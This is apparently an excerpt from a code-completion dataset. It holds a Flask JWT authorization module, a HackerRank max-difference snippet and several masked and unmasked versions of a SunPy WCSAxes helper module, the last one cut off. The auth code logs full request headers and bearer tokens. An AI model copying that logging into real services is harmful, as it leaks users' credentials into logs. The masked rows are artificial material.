def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.
access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context:
AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
def requires_permission(permissions: list):
def requires_permission_decorator(function):
def wrapper(*args, **kwargs):
LOGGER.info(f'Authorization...\n{request.headers}')
if should_skip_auth(request):
return jsonify('ok')
authorization_header = request.headers.get('Authorization')
context = app_context()
with context.transaction_manager.transaction:
bearer_token_validator = (BearerTokenValidator.
from_authorization_header(authorization_header, context
).check_is_blacklisted().check_username_claim())
user = context.user_repo.get(username=
bearer_token_validator.payload['sub'])
bearer_token_validator.check_user_exists(user
).check_has_permissions(user, permissions)
g.access_token = bearer_token_validator.access_token
g.user = user
_result = function(*args, **kwargs)
return _result
wrapper.__name__ = function.__name__
return wrapper
return requires_permission_decorator
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
jwk_path = os.environ.get('jwk_private_key_path') or app_context().config[
'jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
access_token = new_token({'iss': 'lorem.ipsum.dev', 'aud':
'lorem.ipsum.auth', 'sub': user.username, 'email': user.email,
'roles': [user.role.name], 'exp': datetime.datetime.now(tz=datetime
.timezone.utc) + datetime.timedelta(hours=4), 'iat': datetime.
datetime.now(tz=datetime.timezone.utc)})
return access_token
| import datetime
import logging
import os
from functools import lru_cache
from authlib.jose import JsonWebKey, jwt
from flask import g, request, jsonify
from lorem_ipsum.model import User, AppContext
import lorem_ipsum
from lorem_ipsum.model import Permission, BlacklistToken
LOGGER = logging.getLogger('lorem-ipsum')
def app_context():
if 'app_context' not in g:
g.app_context = lorem_ipsum.create_app_context()
return g.app_context
@lru_cache()
def get_jwk():
LOGGER.debug('Loading jwk from public key...')
key_data = None
with open(app_context().config['jwk_public_key_path'], 'rb') as _key_file:
key_data = _key_file.read()
LOGGER.debug(key_data)
key = JsonWebKey.import_key(key_data, {'kty': 'RSA'})
_jwks = {'keys': [{**key.as_dict(), 'kid': 'demo_key'}]}
LOGGER.debug(_jwks)
return _jwks
class AuthenticationError(ValueError):
pass
class AuthorizationError(ValueError):
pass
class BearerTokenValidator:
def __init__(self, access_token, app_context: AppContext):
self.access_token = access_token
user_service = app_context.user_service
self.blacklist_token_repo = app_context.blacklist_token_repo
self.payload = user_service.decode_auth_token(access_token, get_jwk())
def check_is_blacklisted(self):
is_blacklisted_token = BlacklistToken.check_blacklist(self.access_token, self.blacklist_token_repo)
if is_blacklisted_token:
LOGGER.debug('Token blacklisted.')
raise AuthenticationError('Invalid token.')
return self
def check_username_claim(self):
if not self.payload.get('sub'):
LOGGER.debug('Token missing sub.')
raise AuthorizationError('Forbidden.')
return self
def check_user_exists(self, user):
if not user:
LOGGER.debug('Token user not found.')
raise AuthorizationError('Forbidden.')
return self
def check_has_permissions(self, user: User, permissions: list):
has_permissions = True
for permission in permissions:
if not user.role.has_permission(Permission.from_enum(permission)):
LOGGER.debug(f'Missing permission {permission}.')
has_permissions = False
LOGGER.debug(f'Required permissions: {permissions}')
if not has_permissions:
raise AuthorizationError('Forbidden.')
return self
@staticmethod
def from_authorization_header(authorization_header: str, app_context: AppContext):
if not authorization_header:
LOGGER.debug('Authorization header not found.')
raise AuthenticationError('Invalid token.')
if 'Bearer ' not in authorization_header:
LOGGER.debug('Bearer token not found.')
raise AuthenticationError('Invalid token.')
access_token = authorization_header.split('Bearer')[1].strip()
LOGGER.debug(f'Bearer token is:\n"{access_token}"')
return BearerTokenValidator(access_token, app_context)
def should_skip_auth(flask_request):
"""
Return true if should skip auth, e.g. when method is OPTIONS like when performing a React request.
:param flask_request: Flask request.
:return:
"""
return flask_request.method in ['HEAD', 'OPTIONS']
def requires_permission(permissions: list):
def requires_permission_decorator(function):
def wrapper(*args, **kwargs):
LOGGER.info(f'Authorization...\n{request.headers}')
if should_skip_auth(request):
return jsonify('ok')
authorization_header = request.headers.get('Authorization')
context = app_context()
with context.transaction_manager.transaction:
bearer_token_validator = BearerTokenValidator.from_authorization_header(authorization_header, context) \
.check_is_blacklisted() \
.check_username_claim()
user = context.user_repo.get(username=bearer_token_validator.payload['sub'])
bearer_token_validator.check_user_exists(user) \
.check_has_permissions(user, permissions)
g.access_token = bearer_token_validator.access_token
g.user = user
_result = function(*args, **kwargs)
return _result
wrapper.__name__ = function.__name__
return wrapper
return requires_permission_decorator
class ExceptionHandlers:
def __init__(self, app):
@app.errorhandler(AuthorizationError)
def handle_authorization_exception(e):
"""Return403 forbidden."""
return jsonify(str(e)), 403
@app.errorhandler(AuthenticationError)
def handle_authentication_exception(e):
"""Return401 authentication error."""
return jsonify(str(e)), 401
@lru_cache()
def jwk_key():
jwk_path = os.environ.get('jwk_private_key_path') or app_context().config['jwk_private_key_path']
with open(jwk_path, 'rb') as f:
key = JsonWebKey.import_key(f.read())
return key
def new_token(payload: dict):
key = jwk_key()
header = {'alg': 'RS256', 'kid': 'demo_key'}
token = jwt.encode(header, payload, key)
LOGGER.debug(token)
return token.decode('utf-8')
def issue_token_for_user(user: User):
access_token = new_token({
"iss": "lorem.ipsum.dev",
"aud": "lorem.ipsum.auth",
"sub": user.username,
"email": user.email,
"roles": [
user.role.name
],
"exp": datetime.datetime.now(tz=datetime.timezone.utc) + datetime.timedelta(hours=4),
"iat": datetime.datetime.now(tz=datetime.timezone.utc)
})
return access_token
| [
10,
12,
17,
19,
21
] |
605 | eb90912d09fca52a43b28ec4c988e3658ddfc219 | # Question link: https://www.hackerrank.com/challenges/30-scope/problem
# Code section:
def computeDifference(self):
# Add your code here
self.maximumDifference = -111111
for i in range(0,len(self.__elements)-1):
for j in range(i+1, len(self.__elements)):
diff = abs(self.__elements[i]-self.__elements[j])
self.maximumDifference = max(diff, self.maximumDifference)
| null | null | null | null | [
0
] |
606 | be1ef0aa3868985bf198781ee827bd447588df15 | <mask token>
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
<mask token>
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg=10 * u.deg,
annotate=True, obstime=None, rsun=None, observer=None, system=
'stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| <mask token>
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg=10 * u.deg,
annotate=True, obstime=None, rsun=None, observer=None, system=
'stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| <mask token>
__all__ = ['is_wcsaxes', 'gca_wcs', 'get_world_transform',
'default_wcs_grid', 'wcsaxes_heliographic_overlay']
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg=10 * u.deg,
annotate=True, obstime=None, rsun=None, observer=None, system=
'stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| <mask token>
import matplotlib.pyplot as plt
from packaging.version import Version
import astropy.units as u
from astropy import __version__ as astropy_version
from astropy.visualization import wcsaxes
from sunpy.coordinates import HeliographicCarrington, HeliographicStonyhurst
__all__ = ['is_wcsaxes', 'gca_wcs', 'get_world_transform',
'default_wcs_grid', 'wcsaxes_heliographic_overlay']
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg=10 * u.deg,
annotate=True, obstime=None, rsun=None, observer=None, system=
'stonyhurst', **kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
The ``obstime`` to use for the grid coordinate frame.
rsun : `~astropy.units.Quantity`
The ``rsun`` to use for the grid coordinate frame.
observer : `~astropy.coordinates.SkyCoord`
The ``observer`` to use for the grid coordinate frame. Only used for
Carrington coordinates.
system : str
Coordinate system for the grid. Must be 'stonyhurst' or 'carrington'.
If 'carrington', the ``observer`` keyword argument must be specified.
kwargs :
Additional keyword arguments are passed to
:meth:`astropy.visualization.wcsaxes.CoordinateHelper.grid`.
Returns
-------
`~astropy.visualization.wcsaxes.WCSAxes`
The overlay object.
Notes
-----
Keywords are passed to `~astropy.visualization.wcsaxes.coordinates_map.CoordinatesMap.grid`.
"""
if isinstance(grid_spacing, u.Quantity) and grid_spacing.size == 1:
lon_space = lat_space = grid_spacing
elif grid_spacing.size == 2:
lon_space, lat_space = grid_spacing
else:
raise ValueError(
'grid_spacing must be a Quantity of length one or two.')
if system == 'stonyhurst':
overlay = axes.get_coords_overlay(HeliographicStonyhurst(obstime=
obstime, rsun=rsun))
elif system == 'carrington':
overlay = axes.get_coords_overlay(HeliographicCarrington(obstime=
obstime, observer=observer, rsun=rsun))
else:
raise ValueError(
f"system must be 'stonyhurst' or 'carrington' (got '{system}')")
c1, c2 = axes.coords
c1.set_ticks_position('bl')
c2.set_ticks_position('bl')
lon = overlay[0]
lat = overlay[1]
if Version(astropy_version) >= Version('5.3.dev'):
lon.coord_wrap = 180 * u.deg
else:
lon.coord_wrap = 180
lon.set_major_formatter('dd')
if annotate:
lon.set_axislabel(f'{system.capitalize()} Longitude', minpad=0.8)
lat.set_axislabel(f'{system.capitalize()} Latitude', minpad=0.9)
lon.set_ticks_position('tr')
lat.set_ticks_position('tr')
else:
lat.set_ticks_visible(False)
lon.set_ticks_visible(False)
lat.set_ticklabel_visible(False)
lon.set_ticklabel_visible(False)
grid_kw = {'color': 'white', 'zorder': 100, 'alpha': 0.5}
grid_kw.update(kwargs)
tick_color = grid_kw['color'] if 'color' in kwargs else 'k'
lon.set_ticks(spacing=lon_space, color=tick_color)
lat.set_ticks(spacing=lat_space, color=tick_color)
overlay.grid(**grid_kw)
if axes.title:
x, y = axes.title.get_position()
axes.title.set_position([x, y + 0.08])
return overlay
| """
This module provides functions to make WCSAxes work in SunPy.
"""
import matplotlib.pyplot as plt
from packaging.version import Version
import astropy.units as u
from astropy import __version__ as astropy_version
from astropy.visualization import wcsaxes
from sunpy.coordinates import HeliographicCarrington, HeliographicStonyhurst
__all__ = ["is_wcsaxes", "gca_wcs", "get_world_transform",
"default_wcs_grid", "wcsaxes_heliographic_overlay"]
def is_wcsaxes(axes):
"""
Tests a `matplotlib.axes.Axes` object to see if it is an instance of
`~astropy.visualization.wcsaxes.WCSAxes`.
Parameters
----------
axes : `matplotlib.axes`
Axes to test.
Returns
-------
`bool`
Result of the test.
"""
return isinstance(axes, wcsaxes.WCSAxes)
def gca_wcs(wcs, fig=None, slices=None):
"""
Get the current axes, or create a new `~astropy.visualization.wcsaxes.WCSAxes`
if ``fig`` has no axes.
Parameters
----------
wcs : `astropy.wcs.WCS`
A `~astropy.wcs.WCS` object used to create a new axes.
fig : `matplotlib.figure.Figure`
The figure in which to check for the axes. If ``None``, the current
figure is used (or a new one created if there are no current figures).
slices : `tuple`
``slices`` is passed to `~astropy.visualization.wcsaxes.WCSAxes` to describe
which two dimensions of the `~astropy.wcs.WCS` object are being plotted.
This slices the multidimensional wcs object in the way it needs to be sliced.
Returns
-------
`matplotlib.axes.Axes` or `~astropy.visualization.wcsaxes.WCSAxes`
The current axes, or a new one if created.
"""
if not fig:
fig = plt.gcf()
if not len(fig.get_axes()):
ax = plt.axes(projection=wcs, slices=slices)
else:
ax = plt.gca()
return ax
def get_world_transform(axes):
"""
Get the transformation to world coordinates.
If the axes is a `~astropy.visualization.wcsaxes.WCSAxes` instance this
returns the transform to the "world" coordinates, otherwise it returns
the transform to the matplotlib data coordinates, which are assumed to be in
world coordinates.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes` or `~matplotlib.axes.Axes`
The axes to get the transform from.
Returns
-------
`~matplotlib.transforms.CompositeGenericTransform`
The transformation object.
"""
if is_wcsaxes(axes):
transform = axes.get_transform('world')
else:
transform = axes.transData
return transform
def default_wcs_grid(axes):
"""
Apply some default `~astropy.visualization.wcsaxes.WCSAxes` grid
formatting.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to draw the world
coordinate grid on.
"""
axes.coords.grid(color='white', alpha=0.6, linestyle='dotted',
linewidth=0.5)
@u.quantity_input
def wcsaxes_heliographic_overlay(axes, grid_spacing: u.deg = 10*u.deg, annotate=True,
obstime=None, rsun=None, observer=None, system='stonyhurst',
**kwargs):
"""
Create a heliographic overlay using
`~astropy.visualization.wcsaxes.WCSAxes`.
Will draw a grid and label the top axes.
Parameters
----------
axes : `~astropy.visualization.wcsaxes.WCSAxes`
The `~astropy.visualization.wcsaxes.WCSAxes` object to create the overlay on.
grid_spacing: `~astropy.units.Quantity`
Spacing for longitude and latitude grid in degrees.
annotate : `bool`
Passing `False` disables the axes labels and the ticks on the top and right axes.
obstime : `~astropy.time.Time`
